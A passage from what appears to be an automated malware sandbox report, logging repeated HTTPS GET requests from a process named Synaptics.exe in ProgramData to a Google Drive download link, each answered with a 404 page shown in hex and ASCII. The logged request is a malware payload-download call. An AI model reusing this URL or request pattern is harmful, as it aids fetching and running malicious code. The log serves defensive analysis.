                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:44 UTC359INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        117192.168.2.349876142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:45 UTC359OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:45 UTC359INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:45 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-p8qHOb5BFsu+kHrUapqWDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:45 UTC360INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:45 UTC360INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 4c 69 69 53 6d 78 73 6f 74 2b 56 57 36 76 4e 35 50 50 4f 31 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6LiiSmxsot+VW6vN5PPO1A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:45 UTC361INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:45 UTC362INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        118192.168.2.349877142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:45 UTC359OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:45 UTC362INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:45 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-s18nRCFvlmAYvPurvnIVyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:45 UTC363INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 56 32 50 59 76 5a 58 4a 77 42 48 71 70 6c 68 47 38 54 47 78 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fV2PYvZXJwBHqplhG8TGxw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:45 UTC365INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:45 UTC365INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        119192.168.2.349878142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:45 UTC362OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:45 UTC365INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:45 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ivY4M/j03joDFKe5m7plng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:45 UTC366INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:45 UTC366INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 76 4d 37 4b 78 31 35 32 38 4e 32 48 72 74 7a 67 33 46 6f 74 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cvM7Kx1528N2Hrtzg3FotQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:45 UTC368INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:45 UTC368INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        12192.168.2.349747142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:30 UTC37OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:30 UTC37INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:30 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-yjMvikp6904irAGreIkEXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:30 UTC39INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 6f 73 6a 34 45 51 67 44 30 49 67 61 71 6e 45 44 30 33 58 33 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Xosj4EQgD0IgaqnED03X3A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:30 UTC40INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:30 UTC40INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        120192.168.2.349879142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:45 UTC365OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:45 UTC368INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:45 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-SvoCkdVDDEQ6iiAfpTX/Ew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:45 UTC369INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:45 UTC369INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 52 54 62 5a 72 67 71 31 65 4a 43 51 45 58 45 52 37 78 73 76 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KRTbZrgq1eJCQEXER7xsvA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:45 UTC370INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:45 UTC371INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        121192.168.2.349880142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:45 UTC371OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:46 UTC371INHTTP/1.1 404 Not Found
